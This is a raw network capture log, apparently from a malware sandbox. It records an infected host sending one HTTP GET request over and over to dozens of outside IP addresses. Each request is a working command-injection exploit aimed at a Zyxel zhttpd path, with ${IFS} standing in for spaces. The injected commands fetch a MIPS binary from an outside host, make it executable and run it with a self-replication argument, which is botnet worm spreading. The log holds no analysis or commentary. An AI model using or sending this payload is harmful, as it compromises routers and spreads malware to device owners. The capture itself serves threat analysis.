                                          Jan 14, 2024 15:46:12.914103985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3575192.168.2.2341514175.243.103.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914129972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3576192.168.2.236077470.21.138.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914169073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3577192.168.2.2352944187.233.92.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914205074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3578192.168.2.2352934134.248.159.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914222002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3579192.168.2.2339792138.95.132.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914294004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3580192.168.2.234465623.37.132.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914333105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3581192.168.2.2343336142.34.215.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914386988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3582192.168.2.2343734199.65.228.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914417982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3583192.168.2.2355778163.24.134.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914469004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3584192.168.2.23441105.5.137.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914524078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3585192.168.2.234249270.239.49.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914566994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3586192.168.2.2357156186.71.73.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914588928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3587192.168.2.234254432.96.42.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914642096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3588192.168.2.2346452185.118.87.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914690971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3589192.168.2.2350564119.83.211.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914701939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3590192.168.2.233920666.147.244.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914731979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3591192.168.2.2351522168.141.146.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914753914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3592192.168.2.2353736149.82.252.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914819956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3593192.168.2.2337260166.231.225.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914855003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3594192.168.2.2355412156.226.118.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914890051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3595192.168.2.2360404193.59.34.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914954901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3596192.168.2.2345844223.71.118.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.914990902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3597192.168.2.2340160164.103.107.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915026903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3598192.168.2.2351494188.18.113.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915052891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3599192.168.2.2337728189.115.142.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915091038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3600192.168.2.2344132118.143.31.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915154934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3601192.168.2.2344524168.172.230.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915194035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3602192.168.2.235745498.240.6.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915222883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3603192.168.2.23560569.112.42.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915251017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3604192.168.2.233777897.173.19.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915308952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3605192.168.2.2345772157.255.124.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915344954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3606192.168.2.2337156219.70.75.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915389061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3607192.168.2.233547025.135.178.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915405035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3608192.168.2.234689013.85.201.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915452957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3609192.168.2.233924282.96.226.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915498972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3610192.168.2.2355070147.228.224.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915529013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3611192.168.2.235766654.144.176.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915556908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3612192.168.2.2334220154.233.239.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915618896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3613192.168.2.2341356159.110.3.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915661097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3614192.168.2.2353848152.122.97.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915689945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3615192.168.2.2345318179.71.31.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915719986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3616192.168.2.2345248196.168.75.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915757895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3617192.168.2.2358592118.85.43.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915796041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3618192.168.2.2336074153.7.11.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915858984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3619192.168.2.2339116188.41.114.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915879011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3620192.168.2.2360510101.166.31.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915910006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3621192.168.2.235380290.148.117.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915935993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3622192.168.2.2360778197.61.140.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.915958881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3623192.168.2.2359866177.217.245.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.916018009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3624192.168.2.2333870163.132.223.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.916059971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3625192.168.2.2359832158.238.37.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938287973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3626192.168.2.2353350193.147.146.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938302994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3627192.168.2.2341148180.20.136.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938364983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3628192.168.2.234015046.80.33.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938390970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3629192.168.2.2357846152.247.154.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938426018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3630192.168.2.234591235.50.105.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938473940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3631192.168.2.2336720196.104.89.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938507080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3632192.168.2.234848623.110.20.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938524008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3633192.168.2.235513462.11.89.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938591003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3634192.168.2.23554481.136.124.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938626051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3635192.168.2.2342500180.135.30.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938678980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3636192.168.2.2350884150.60.12.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.938714981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3637192.168.2.2344118133.252.142.253443
                                          TimestampBytes transferredDirectionData
